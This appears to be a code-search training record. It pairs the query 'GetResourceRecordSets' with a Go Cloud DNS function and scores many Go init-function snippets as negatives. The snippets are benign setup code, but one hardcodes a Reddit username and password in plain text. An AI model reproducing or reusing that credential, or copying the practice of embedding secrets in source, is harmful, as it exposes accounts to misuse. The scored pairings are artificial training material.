{\n\t\tlog.Fatal(\"unable to read env: \", err)\n\t}\n}", "func Initialize() {\n\t// Find home directory.\n\thome, err := homedir.Dir()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tconfFile := fmt.Sprintf(\"%s\"+string(os.PathSeparator)+\"%s\", home, CfgFileName)\n\terr = ioutil.WriteFile(confFile, []byte{}, 0755)\n\tif err != nil {\n\t\tfmt.Printf(\"Unable to write a new configuration file: %v\", err)\n\t}\n\t// Search config in home directory with name \".scloud\" (without extension).\n\tLoad(home, confFile)\n}", "func (hfc *FabricSetup) Init() {\n\t//adding logger for outut\n\tbackend := logging.NewLogBackend(os.Stderr, \"\", 0)\n\tbackendFormatter := logging.NewBackendFormatter(backend, format)\n\tbackendLeveled := logging.AddModuleLevel(backend)\n\tbackendLeveled.SetLevel(logging.DEBUG, \"\")\n\tlogging.SetBackend(backendLeveled, backendFormatter)\n\tlogger.Info(\"================ Creating New SDK Instance ================\")\n\n\t//initializing SDK\n\tvar config = config.FromFile(hfc.ConfigFileName)\n\tvar err error\n\thfc.Sdk, err = fabsdk.New(config)\n\tif err != nil {\n\t\tlogger.Infof(\"Unable to create new instance of SDk: %s\\n\", err)\n\t}\n\n\t//clean up user data from previous runs\n\tconfigBackend, err := hfc.Sdk.Config()\n\tif err != nil {\n\t\tlogger.Fatal(err)\n\t}\n\n\tcryptoSuiteConfig := cryptosuite.ConfigFromBackend(configBackend)\n\tidentityConfig, err := mspIdentity.ConfigFromBackend(configBackend)\n\tif err != nil {\n\t\tlogger.Fatal(err)\n\t}\n\n\tkeyStorePath := cryptoSuiteConfig.KeyStorePath()\n\tcredentialStorePath := identityConfig.CredentialStorePath()\n\thfc.cleanupPath(keyStorePath)\n\thfc.cleanupPath(credentialStorePath)\n}", "func init() {\n\tInitialize(Config{\n\t\tUseKms: true,\n\t\tSource: Auto,\n\t})\n}", "func init() {\n\tinitconf(configLocation)\n}", "func init() {\n\tl, _ := NewSDKLogger()\n\tSetSDKLogger(l)\n}", "func init() {\n\tif v := os.Getenv(\"GOUTIL_PREFIX\"); v != \"\" {\n\t\tprefix = v\n\t}\n\tif v := os.Getenv(\"GOUTIL_ENVIRON\"); v != \"\" {\n\t\tenviron = v\n\t} else if v = os.Getenv(prefix + \"ENVIRON\"); v != \"\" {\n\t\tenviron = v\n\t} else {\n\t\tenviron = \"devel\"\n\t}\n\tif v := os.Getenv(\"GOUTIL_HOME\"); v != \"\" {\n\t\thome = v\n\t} else if v = os.Getenv(prefix + \"HOME\"); prefix != \"\" && v != \"\" {\n\t\thome = v\n\t} else if h, err := os.Executable(); err == nil {\n\t\thome = path.Dir(path.Dir(h))\n\t} else {\n\t\thome = \".\"\n\t}\n}", "func Init(configPath ...string) {\n\tmgr = newAwsMgr(configPath...)\n}", "func init() {\n\tif err := godotenv.Load(); err != nil {\n\t\tlog.Print(\"No .env file found\")\n\t}\n}", "func init() {\n\tInitSystemVariables()\n}", "func initClient() error {\n\tvar err error\n\tkey := config.PrivateString(\"GOOGLE_MAPS_API_KEY\")\n\tif key == \"\" {\n\t\treturn errors.New(\"Please configure a `GOOGLE_MAPS_API_KEY`\")\n\t}\n\tclient, err = maps.NewClient(maps.WithAPIKey(key))\n\treturn err\n}", "func initWithEnv() error {\n\t// Get paths\n\tvar currentProject string\n\n\tif os.Getenv(\"ENVIRONMENT\") == \"DEV\" {\n\t\tcurrentProject = os.Getenv(\"FIREBASE_PROJECTID_DEV\")\n\t} else if os.Getenv(\"ENVIRONMENT\") == \"PROD\" {\n\t\tcurrentProject = os.Getenv(\"FIREBASE_PROJECTID_PROD\")\n\t}\n\n\t// Initialize Firestore\n\tclient, err := firestore.NewClient(context.Background(), currentProject)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"UsernameAvailable [Init Firestore]: %v\", err)\n\t}\n\n\t// Initialize Sawmill\n\tsawmillLogger, err := sawmill.InitClient(currentProject, os.Getenv(\"GCLOUD_CONFIG\"), os.Getenv(\"ENVIRONMENT\"), \"UsernameAvailable\")\n\tif err != nil {\n\t\tlog.Printf(\"UsernameAvailable [Init Sawmill]: %v\", err)\n\t}\n\n\tfirestoreClient = client\n\tlogger = sawmillLogger\n\treturn nil\n}", "func init() {\n\tdrmaa2os.RegisterJobTracker(drmaa2os.SingularitySession, NewAllocator())\n}", "func init() {\n\tcfg, err := config.LoadDefaultConfig(context.TODO(), config.WithSharedConfigProfile(\"tavern-automation\"))\n\tif err != nil {\n\t\tlog.Fatal(\"ERROR: Unable to resolve credentials for tavern-automation: \", err)\n\t}\n\n\tstsc = sts.NewFromConfig(cfg)\n\torgc = organizations.NewFromConfig(cfg)\n\tec2c = ec2.NewFromConfig(cfg)\n\n\t// NOTE: By default, only describes regions that are enabled in the root org account, not all Regions\n\tresp, err := ec2c.DescribeRegions(context.TODO(), &ec2.DescribeRegionsInput{})\n\tif err != nil {\n\t\tlog.Fatal(\"ERROR: Unable to describe regions\", err)\n\t}\n\n\tfor _, region := range resp.Regions {\n\t\tregions = append(regions, *region.RegionName)\n\t}\n\tfmt.Println(\"INFO: Listing all enabled regions:\")\n\tfmt.Println(regions)\n}", "func init() {\n\tdrmaa2os.RegisterJobTracker(drmaa2os.LibDRMAASession, NewAllocator())\n}", "func init() {\n\t// if envFileName exists in the current directory, load it\n\tlocalEnvFile := fmt.Sprintf(\"./%s\", envFileName)\n\tif _, localEnvErr := os.Stat(localEnvFile); localEnvErr == nil {\n\t\tif loadErr := godotenv.Load(localEnvFile); loadErr != nil {\n\t\t\tstdErr.Printf(\"Could not load env file <%s>: %s\", localEnvFile, loadErr)\n\t\t}\n\t}\n\n\t// if envFileName exists in the user's home directory, load it\n\tif homeDir, homeErr := os.UserHomeDir(); homeErr == nil {\n\t\thomeEnvFile := fmt.Sprintf(\"%s/%s\", homeDir, \".xmcenv\")\n\t\tif _, homeEnvErr := os.Stat(homeEnvFile); homeEnvErr == nil {\n\t\t\tif loadErr := godotenv.Load(homeEnvFile); loadErr != nil {\n\t\t\t\tstdErr.Printf(\"Could not load env file <%s>: %s\", homeEnvFile, loadErr)\n\t\t\t}\n\t\t}\n\t}\n}", "func init() {\n\tctx = context.Background()\n\tlog.Println(\"Initialize SpreadSheet....\")\n\t// b, err := ioutil.ReadFile(\"credentials/credentials.json\")\n\t// if err != nil {\n\t// \tlog.Fatalf(\"Unable to read client secret file: %v\", err)\n\t// }\n\tb := []byte(os.Getenv(\"GOOGLE_APPLICATION_CREDENTIALS\"))\n\tconfig, err := google.ConfigFromJSON(b)\n\tif err != nil {\n\t\tlog.Fatalf(\"Unable to parse client secret file to config: %v\", err)\n\t}\n\t\n\tclient := getClient(config)\n\tSheet, _ = sheets.New(client)\n\tphotoAPI, _ = gphotos.NewClient(client)\n\tspreadSheetID = os.Getenv(\"SPREEDSHEET_ID\")\n\tmonthToDiscount = map[string]int{\n\t\t\"40\": 50000,\n\t\t\"50\": 25000,\n\t}\n\tp = message.NewPrinter(language.English)\n}", "func (p *provider) Init(ctx servicehub.Context) error {\n\tp.accessKeyValidator = &accessKeyValidator{\n\t\tTokenService: p.TokenService,\n\t\tcollection: AccessItemCollection{},\n\t}\n\tctx.AddTask(p.InitAKItemTask)\n\tctx.AddTask(p.SyncAKItemTask)\n\treturn nil\n}", "func init() {\n\t// Configure and start the API\n\tgo func() {\n\t\tapp := igcinfo.App{\n\t\t\tListenPort: listenPort}\n\t\tapp.StartServer()\n\t}()\n\n\t// Ensure server is started before continuing\n\ttime.Sleep(1000 * time.Millisecond)\n}", "func init() {\n\t// if envFileName exists in the current directory, load it\n\tlocalEnvFile := fmt.Sprintf(\"./%s\", envFileName)\n\tif _, localEnvErr := os.Stat(localEnvFile); localEnvErr == nil {\n\t\tif loadErr := godotenv.Load(localEnvFile); loadErr != nil {\n\t\t\tfmt.Fprintf(os.Stderr, \"Could not load env file <%s>: %s\", localEnvFile, loadErr)\n\t\t}\n\t}\n\n\t// if envFileName exists in the user's home directory, load it\n\tif homeDir, homeErr := os.UserHomeDir(); homeErr == nil {\n\t\thomeEnvFile := fmt.Sprintf(\"%s/%s\", homeDir, \".xmcenv\")\n\t\tif _, homeEnvErr := os.Stat(homeEnvFile); homeEnvErr == nil {\n\t\t\tif loadErr := godotenv.Load(homeEnvFile); loadErr != nil {\n\t\t\t\tfmt.Fprintf(os.Stderr, \"Could not load env file <%s>: %s\", homeEnvFile, loadErr)\n\t\t\t}\n\t\t}\n\t}\n}", "func (u *Uploader) init() {\n\t// generate mac and upload token\n\tputPolicy := storage.PutPolicy{\n\t\tScope: u.bucket,\n\t}\n\tmac := qbox.NewMac(u.accessKey, u.secretKey)\n\tu.upToken = putPolicy.UploadToken(mac)\n\n\tcfg := storage.Config{}\n\t// 空间对应的机房\n\tcfg.Zone = &storage.ZoneHuadong\n\t// 是否使用https域名\n\tcfg.UseHTTPS = false\n\t// 上传是否使用CDN上传加速\n\tcfg.UseCdnDomains = false\n\t// 构建表单上传的对象\n\tu.formUploader = storage.NewFormUploader(&cfg)\n\tu.bucketManager = storage.NewBucketManager(mac, &cfg)\n\n\treturn\n}", "func init() {\n\tvar err error\n\n\tsignKey, err = ioutil.ReadFile(privKeyPath)\n\tif err != nil {\n\t\tlog.Fatal(\"Error reading private key\")\n\t\treturn\n\t}\n\n\tverifyKey, err = ioutil.ReadFile(pubKeyPath)\n\tif err != nil {\n\t\tlog.Fatal(\"Error reading private key\")\n\t\treturn\n\t}\n\n\t// set up DB\n\tsession, err = mgo.Dial(\"localhost\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tsession.SetSafe(&mgo.Safe{})\n\n\tuserDB = session.DB(\"Theseus\").C(\"users\")\n\tfileDB = session.DB(\"Theseus\").C(\"files\")\n\tfs = http.FileServer(http.Dir(\"client\"))\n\thttp.HandleFunc(\"/\", routeHandler)\n}", "func init() {\n\n\tdockerapi.RemoveLiveContainersFromPreviousRun()\n}", "func init() {\n\ttoken = os.Getenv(\"SLACK_TOKEN\")\n\tif token == \"\" {\n\t\tpanic(errors.New(\"SLACK_TOKEN must be provided\"))\n\t}\n\n\tchrisifyPath = os.Getenv(\"CHRISIFY_PATH\")\n\thaarPath = os.Getenv(\"HAAR_FILE\")\n\n\taccessKeyID = os.Getenv(\"AWS_ACCESS_KEY_ID\")\n\tsecretKeyID = os.Getenv(\"AWS_SECRET_ACCESS_KEY\")\n\n\ts3Bucket = os.Getenv(\"S3_BUCKET_NAME\")\n\n\tvar err error\n\tsess, err = session.NewSession(&aws.Config{\n\t\tRegion: aws.String(defaultRegion),\n\t\tCredentials: credentials.NewEnvCredentials(),\n\t})\n\n\tif err != nil {\n\t\tpanic(err.Error())\n\t}\n\n\tsvc = s3.New(sess)\n\n}", "func init() {\n\tflag.Parse()\n\t// Init the models and backend redis store.\n\trs := libstore.NewStore(*redisServer)\n\tuser.Setup(rs)\n\tfeed.Setup(rs)\n\t// Init feeder.\n\tfd = feeder.NewFeeder(\"http://localhost:\" + *keywordServerEndPoint)\n}", "func init() {\n\tprepareOptionsFromCommandline(&configFromInit)\n\tparseConfigFromEnvironment(&configFromInit)\n}", "func Init() {\n\tdocker.Init()\n\thost.Init()\n\tlabel.Init()\n\tospackages.Init()\n\tdiff.Init()\n\tcontainer.Init()\n}", "func init() {\n\terr := os.MkdirAll(util.DIR, 0755)\n\tif err != nil {\n\t\tprintln(err.Error())\n\t\tos.Exit(1)\n\t}\n}", "func init() {\n\t// HackerNews allows API use without authentication, so we don't need an account.\n\t// We can just create our client object and use it.\n\thackerNewsClient = gophernews.NewClient()\n\t// Reddit, on the other hand, does require authentication. I set up an account, but you'll\n\t// need to set up your own. It's free.\n\t// Here, I pass in the username, password, and user agent string the API client will use.\n\tvar err error\n\tredditSession, err = geddit.NewLoginSession(\"g_d_bot\", \"K417k4FTua52\", \"gdAgent v0\")\n\t// In case of an error, we'll just exit the program.\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n}", "func init() {\n\tlog.DebugMode = cuxs.IsDebug()\n\tlog.Log = log.New()\n\n\tif e := cuxs.DbSetup(); e != nil {\n\t\tpanic(e)\n\t}\n}", "func init() {\n\tcheckIsGnuTar()\n/*\n\tsher = gosimhash.New(\"./dict/jieba.dict.utf8\",\n\t\t\t\t\t\t\"./dict/hmm_model.utf8\",\n\t\t\t\t\t\t\"./dict/idf.utf8\",\n\t\t\t\t\t\"./dict/stop_words.utf8\")\n\t// defer sher.Free()*/\n}", "func (s *Store) Init(ctx context.Context, metadataRaw secretstores.Metadata) error {\n\tmetadata, err := s.parseSecretManagerMetadata(metadataRaw)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclient, err := s.getClient(ctx, metadata)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to setup secretmanager client: %s\", err)\n\t}\n\n\ts.client = client\n\ts.ProjectID = metadata.ProjectID\n\n\treturn nil\n}", "func InitLocal(initialPassword string) {\n\tdb = getDB()\n\tlog.Debugf(\"Openend database %v, starting bucket definition\", db)\n\n\terr := db.Update(func(transaction *storage.Tx) error {\n\t\tif _, createErr := transaction.CreateBucketIfNotExists([]byte(devicesBucket)); createErr != nil {\n\t\t\tlog.Errorf(\"Error creating devicesBucket: %v\", createErr)\n\t\t\treturn createErr\n\t\t}\n\t\tif _, createErr := transaction.CreateBucketIfNotExists([]byte(passwordBucket)); createErr != nil {\n\t\t\tlog.Errorf(\"Error creating passwordBucket: %v\", createErr)\n\t\t\treturn createErr\n\t\t}\n\t\treturn nil\n\t})\n\n\tif err != nil {\n\t\tlog.Errorf(\"Got err %v, panic!!!\", err)\n\t\tpanic(err)\n\t}\n\n\terr = insertPassword(initialPassword)\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func init() {\n\tShCache = &ShareCache{\n\t\tLRPC: &LeaderRpcAddr{\n\t\t\tAddr: \"\",\n\t\t\tPort: \"\",\n\t\t},\n\t}\n}", "func (svc *Service) Init(ctx context.Context, cfg *config.Configuration, buildTime, gitCommit, version string) (err error) {\n\n\tsvc.cfg = cfg\n\n\t// Get mongoDB connection (non-fatal)\n\tsvc.mongoDataStore, err = getMongoDataStore(svc.cfg)\n\tif err != nil {\n\t\tlog.Event(ctx, \"mongodb datastore error\", log.ERROR, log.Error(err))\n\t}\n\n\t// Get data baker kafka producer\n\tsvc.dataBakerProducer, err = getKafkaProducer(ctx, svc.cfg.Brokers, svc.cfg.DatabakerImportTopic, svc.cfg.KafkaMaxBytes)\n\tif err != nil {\n\t\tlog.Event(ctx, \"databaker kafka producer error\", log.FATAL, log.Error(err))\n\t\treturn err\n\t}\n\n\t// Get input file available kafka producer\n\tsvc.inputFileAvailableProducer, err = getKafkaProducer(ctx, svc.cfg.Brokers, svc.cfg.InputFileAvailableTopic, svc.cfg.KafkaMaxBytes)\n\tif err != nil {\n\t\tlog.Event(ctx, \"direct kafka producer error\", log.FATAL, log.Error(err))\n\t\treturn err\n\t}\n\n\t// Create Identity Client\n\tsvc.identityClient = clientsidentity.New(svc.cfg.ZebedeeURL)\n\n\t// Create dataset and recie API clients.\n\t// TODO: We should consider replacing these with the corresponding dp-api-clients-go clients\n\tclient := dphttp.NewClient()\n\tsvc.datasetAPI = &dataset.API{Client: client, URL: svc.cfg.DatasetAPIURL, ServiceAuthToken: svc.cfg.ServiceAuthToken}\n\tsvc.recipeAPI = &recipe.API{Client: client, URL: svc.cfg.RecipeAPIURL}\n\n\t// Get HealthCheck and register checkers\n\tversionInfo, err := healthcheck.NewVersionInfo(buildTime, gitCommit, version)\n\tif err != nil {\n\t\tlog.Event(ctx, \"error creating version info\", log.FATAL, log.Error(err))\n\t\treturn err\n\t}\n\tsvc.healthCheck = getHealthCheck(versionInfo, svc.cfg.HealthCheckCriticalTimeout, svc.cfg.HealthCheckInterval)\n\tif err := svc.registerCheckers(ctx); err != nil {\n\t\treturn errors.Wrap(err, \"unable to register checkers\")\n\t}\n\n\t// Get HTTP router and server with middleware\n\tr := mux.NewRouter()\n\tm := svc.createMiddleware(svc.cfg)\n\tsvc.server = getHTTPServer(svc.cfg.BindAddr, m.Then(r))\n\n\t// Create API with job service\n\turlBuilder := url.NewBuilder(svc.cfg.Host, svc.cfg.DatasetAPIURL)\n\tjobQueue := importqueue.CreateImportQueue(svc.dataBakerProducer.Channels().Output, svc.inputFileAvailableProducer.Channels().Output)\n\tjobService := job.NewService(svc.mongoDataStore, jobQueue, svc.datasetAPI, svc.recipeAPI, urlBuilder)\n\tsvc.importAPI = api.Setup(r, svc.mongoDataStore, jobService, cfg)\n\treturn nil\n}", "func init() {\n\n\tlog.Println(\"Sitemap init user\", os.Getenv(\"SECRET_USERNAME\"))\n\tmongodbuser = os.Getenv(\"SECRET_USERNAME\")\n\tmongodbpass = os.Getenv(\"SECRET_PASSWORD\")\n\tthemes = \"job\"\n\tlocale = \"fi_FI\"\n\n}", "func InitDatastore(t *testing.T, kinds ...ds.Kind) CleanupFunc {\n\tr := rand.New(rand.NewSource(time.Now().UnixNano()))\n\n\tif os.Getenv(\"DATASTORE_EMULATOR_HOST\") == \"\" {\n\t\tt.Skip(`Skipping tests that require a local Cloud Datastore emulator.\n\nRun\n\n\t\"gcloud beta emulators datastore start --no-store-on-disk --host-port=localhost:8888\"\n\nand then run\n\n $(gcloud beta emulators datastore env-init)\n\nto set the environment variables. When done running tests you can unset the env variables:\n\n $(gcloud beta emulators datastore env-unset)\n\n`)\n\t}\n\terr := ds.InitForTesting(\"test-project\", fmt.Sprintf(\"test-namespace-%d\", r.Uint64()))\n\tassert.NoError(t, err)\n\tcleanup(t, kinds...)\n\treturn func() {\n\t\tcleanup(t, kinds...)\n\t}\n}", "func init() {\n\t// common\n\tviper.SetDefault(\"log.level\", \"info\")\n\n\t// ethereum\n\tviper.SetDefault(\"ethereum.addr\", \"https://cloudflare-eth.com\")\n\tviper.SetDefault(\"ethereum.wss\", false)\n\n\t// grpc admin\n\tviper.SetDefault(\"grpc.host\", \"0.0.0.0\")\n\tviper.SetDefault(\"grpc.port\", 9090)\n\tviper.SetDefault(\"grpc.timeout\", \"120s\")\n\n\t// cache\n\tviper.SetDefault(\"cachesize\", 100)\n}", "func init() {\n\n\t// 添加多核支持,适合当前 CPU 计算密集的场景。\n\truntime.GOMAXPROCS(runtime.NumCPU())\n\n\tkingpin.Version(version)\n\tkingpin.Parse()\n\n\t// init ignore dir and file list.\n\tignoreFileList = make([]string, 0)\n\tignoreDirList = make([]string, 0)\n\n\tif len(*igFile) != 0 {\n\t\tfor _, v := range strings.Split(*igFile, \",\") {\n\t\t\tignoreFileList = append(ignoreFileList, v)\n\t\t}\n\t\tfmt.Println(\"ignoreFileList =>\", ignoreFileList)\n\t}\n\tif len(*igDir) != 0 {\n\t\tfor _, v := range strings.Split(*igDir, \",\") {\n\t\t\tignoreDirList = append(ignoreDirList, v)\n\t\t}\n\t\tfmt.Println(\"ignoreDirList =>\", ignoreDirList)\n\t}\n\n}", "func init() {\n\t// Load env variable from .env file\n\tenvConfig = env.NewEnvConfig(\"../.env\")\n\n\t// Load cors domain list\n\tcorsDomainList = strings.Split(envConfig[\"APP_CORS_DOMAIN\"], \",\")\n\n\thost = envConfig[\"APP_HOST\"]\n\tif str.StringToBool(envConfig[\"APP_DEBUG\"]) {\n\t\tdebug = true\n\t\tlog.Printf(\"Running on Debug Mode: On at host [%v]\", host)\n\t}\n}", "func init() {\n\tReader = &devReader{name: Devices[runtime.GOOS]}\n}", "func init() {\n\tstartKeychain()\n}", "func init() {\n\tMemory = &memoryStorage{\n\t\ttraces: make(map[string]tracer.Trace),\n\t\tservices: make(map[string]string),\n\t\tserviceDeps: make(map[string]*tracer.Dependencies),\n\t}\n}", "func (instance *DSInstance) Initialize(configuration DSConfig) error {\n\tclient, err := datastore.NewClient(configuration.Context,\n\t\tconfiguration.ProjectID,\n\t\toption.WithCredentialsFile(configuration.ServiceAccountFile))\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"DSInstance.Initialize\")\n\t}\n\n\tinstance.client = *client\n\tinstance.namespace = configuration.Namespace\n\n\treturn nil\n}", "func InitializeAll() {\n\tcs, err := framework.NewConfigStore(Constants.ComponentName)\n\tif err != nil {\n\t\tlog.Error(\"Panic while setting up config store: \" + err.Error())\n\t\tpanic(err)\n\t}\n\terr = cs.SetupEnvironmentFromSSM()\n\tif err != nil {\n\t\tlog.Error(\"Panic pulling from SSM: \" + err.Error())\n\t\tpanic(err)\n\t}\n}", "func init() {\n\tlog.Trace(\"Initializing the CHAPI linux driver\")\n\tdriver = &LinuxDriver{}\n}", "func init() {\n\tdebugMode = (os.Getenv(\"DEBUG\") != \"\")\n\n\tarnPattern = regexp.MustCompile(\"\\\\Aarn:aws:sts::\\\\d+:assumed-role/([a-z0-9_-]+)/(i-[0-9a-f]+)\\\\z\")\n\n\tcaKeyBucket, caKeyPath, err := parseS3URI(os.Getenv(\"CA_KEY_URI\"))\n\tif err != nil {\n\t\tinitError = fmt.Errorf(\"CA_KEY_URI: %w\", err)\n\t\treturn\n\t}\n\n\tob, op, err := parseS3URI(os.Getenv(\"OUTPUT_URI_PREFIX\"))\n\tif err != nil {\n\t\tinitError = fmt.Errorf(\"OUTPUT_URI_PREFIX: %w\", err)\n\t\treturn\n\t}\n\toutBucket = ob\n\toutPathPrefix = op\n\n\taws, err := newAwsClient()\n\tif err != nil {\n\t\tinitError = fmt.Errorf(\"initializing aws client: %w\", err)\n\t\treturn\n\t}\n\tawsCli = aws\n\n\tcaKey, err := awsCli.getS3Object(caKeyBucket, caKeyPath)\n\tif err != nil {\n\t\tfmt.Printf(\"error getting CA key, bucket=%q path=%q\\n\", caKeyBucket, caKeyPath)\n\t\tinitError = fmt.Errorf(\"getting caKey: %w\", err)\n\t\treturn\n\t}\n\n\tsigner, err = NewSigner(caKey)\n\tif err != nil {\n\t\tinitError = fmt.Errorf(\"creating signer: %w\", err)\n\t\treturn\n\t}\n\n\tif debugMode {\n\t\tfmt.Printf(\"init completed\")\n\t}\n}", "func initGlobals() {\n\tglobals.spec, globals.specFilename, globals.specErr = parseSpecFileEnv()\n\tglobals.genSK, globals.genSKErr = parseGenesisSKEnv()\n\n\tlog := log.\n\t\tWithField(specFileEnv, nil).\n\t\tWithField(genSKEnv, nil)\n\n\tif globals.specErr == nil {\n\t\tlog = log.WithField(specFileEnv, globals.specFilename)\n\t}\n\tif globals.genSKErr == nil {\n\t\tlog = log.WithField(genSKEnv, globals.genSK.Hex())\n\t}\n\n\tlog.Info(\"Environment variables:\")\n}", "func initialize() {\n\treadCommandLine()\n\n\tif *dbFlag == \"\" {\n\t\tinstallEmptyConfiguration()\n\t} else {\n\t\tlogMessage(\"Trying to load configuration from %s\", *dbFlag)\n\t\tfile, err := openFile(*dbFlag)\n\t\tif err != nil {\n\t\t\tinstallEmptyConfiguration()\n\t\t} else {\n\t\t\tputConfiguration(readFully(file))\n\t\t}\n\t}\n\n}", "func (service *Service) Init() error {\n\terr := service.kafka.Init()\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn service.clickhouse.Init()\n}" ]
[ "0.6706975", "0.6563391", "0.6534072", "0.6531327", "0.65187436", "0.6465373", "0.6455937", "0.6430652", "0.6427519", "0.6399086", "0.63725406", "0.6368758", "0.63631004", "0.6351088", "0.63325745", "0.62966895", "0.62871706", "0.62633616", "0.6257511", "0.6252291", "0.6250331", "0.6233993", "0.6211551", "0.6206732", "0.6203158", "0.6196217", "0.6187778", "0.6185475", "0.6177621", "0.61728233", "0.6150979", "0.614987", "0.6113362", "0.6094353", "0.60802555", "0.60682064", "0.6027348", "0.60213363", "0.6020298", "0.60170764", "0.5999897", "0.5982877", "0.5982012", "0.5969969", "0.5959404", "0.5944702", "0.59365565", "0.5932518", "0.5909575", "0.59075356", "0.59014726", "0.59007007", "0.58983743", "0.58974785", "0.5873175", "0.58728784", "0.58603156", "0.58463657", "0.5838441", "0.58335614", "0.58277804", "0.58241373", "0.5823056", "0.5817501", "0.58170164", "0.58094144", "0.58041686", "0.5803388", "0.5795031", "0.57793885", "0.5770096", "0.57665956", "0.5739465", "0.57371956", "0.5736403", "0.5733903", "0.5731106", "0.5724719", "0.57245463", "0.5719427", "0.5710962", "0.5706886", "0.57066894", "0.5705138", "0.569939", "0.56968564", "0.56948817", "0.5687478", "0.5686949", "0.5683203", "0.5669393", "0.56671983", "0.56632775", "0.5662137", "0.5654038", "0.5650771", "0.5644343", "0.5642151", "0.56355053", "0.5633574", "0.56313044" ]
0.0
-1
GetResourceRecordSets will return all resource record sets for a managed zone
func (d *DNS) GetResourceRecordSets(projectID string, managedZone string) ([]*v1.ResourceRecordSet, error) { ctx := context.Background() rrsService := v1.NewResourceRecordSetsService(d.V1) rrsListCall := rrsService.List(projectID, managedZone).Context(ctx) rrsList, err := d.Calls.ResourceRecordSetsList.Do(rrsListCall) if err != nil { return nil, err } return rrsList.Rrsets, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (s *cloudDNSService) getResourceRecordSets(dnsZone string) ([]*dns.ResourceRecordSet, error) {\n\ttimer := pkg.NewTimer(prometheus.ObserverFunc(func(v float64) {\n\t\trequestRecordsTimeSummary.WithLabelValues(dnsZone).Observe(v)\n\t}))\n\tdefer timer.ObserveDuration()\n\n\tpageToken := \"\"\n\n\tresourceRecordSets := make([]*dns.ResourceRecordSet, 0, 16)\n\tfor {\n\t\treq := s.service.ResourceRecordSets.List(s.project, dnsZone)\n\t\tif pageToken != \"\" {\n\t\t\treq.PageToken(pageToken)\n\t\t}\n\t\tresp, err := req.Do()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"[Cloud DNS] Error getting DNS resourceRecordSets from zone %s: %v\", dnsZone, err)\n\t\t}\n\t\tfor _, r := range resp.Rrsets {\n\t\t\tresourceRecordSets = append(resourceRecordSets, r)\n\t\t}\n\t\tif resp.NextPageToken == \"\" {\n\t\t\tbreak\n\t\t}\n\t\tpageToken = resp.NextPageToken\n\t}\n\treturn resourceRecordSets, nil\n}", "func (p *Provider) GetRecords(ctx context.Context, zone string) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\treq, err := http.NewRequest(http.MethodGet, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\tdata, err := ioutil.ReadAll(res.Body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar recordSets LeasewebRecordSets\n\tjson.Unmarshal([]byte(data), &recordSets)\n\n\tvar records []libdns.Record\n\n\tfor _, resourceRecordSet := range recordSets.ResourceRecordSets {\n\t\tfor _, content := range resourceRecordSet.Content {\n\t\t\trecord := libdns.Record{\n\t\t\t\tName: resourceRecordSet.Name,\n\t\t\t\tValue: content,\n\t\t\t\tType: resourceRecordSet.Type,\n\t\t\t\tTTL: time.Duration(resourceRecordSet.TTL) * time.Second,\n\t\t\t}\n\t\t\trecords = append(records, record)\n\t\t}\n\t}\n\n\treturn records, nil\n}", "func (s *FastDNSv2Service) GetZoneRecordSets(ctx context.Context, zone string, opt *ListZoneRecordSetOptions) (*ListZoneRecordSets, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/recordsets\", zone)\n\n\tu, err := addOptions(u, opt)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar z *ListZoneRecordSets\n\tresp, err := s.client.Do(ctx, req, &z)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn z, resp, nil\n}", "func (p *AWSProvider) Records(zone string) ([]*endpoint.Endpoint, error) {\n\tendpoints := []*endpoint.Endpoint{}\n\n\tf := func(resp *route53.ListResourceRecordSetsOutput, lastPage bool) (shouldContinue bool) {\n\t\tfor _, r := range resp.ResourceRecordSets {\n\t\t\t// TODO(linki, ownership): Remove once ownership system is in place.\n\t\t\t// See: https://github.com/kubernetes-incubator/external-dns/pull/122/files/74e2c3d3e237411e619aefc5aab694742001cdec#r109863370\n\t\t\tswitch aws.StringValue(r.Type) {\n\t\t\tcase route53.RRTypeA, route53.RRTypeCname, route53.RRTypeTxt:\n\t\t\t\tbreak\n\t\t\tdefault:\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfor _, rr := range r.ResourceRecords {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(rr.Value), aws.StringValue(r.Type)))\n\t\t\t}\n\n\t\t\tif r.AliasTarget != nil {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(r.AliasTarget.DNSName), \"ALIAS\"))\n\t\t\t}\n\t\t}\n\n\t\treturn true\n\t}\n\n\tparams := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(expandedHostedZoneID(zone)),\n\t}\n\n\tif err := p.Client.ListResourceRecordSetsPages(params, f); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn endpoints, nil\n}", "func getHostedZoneRecords(svc *route53.Route53, zone *string) (*route53.ListResourceRecordSetsOutput, error) {\n\n\trrInput := 